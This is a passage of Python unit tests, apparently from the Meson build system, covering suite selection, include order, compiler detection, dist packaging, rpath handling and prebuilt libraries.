self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libefile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
# pkg-config and pkgconf does not respect the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
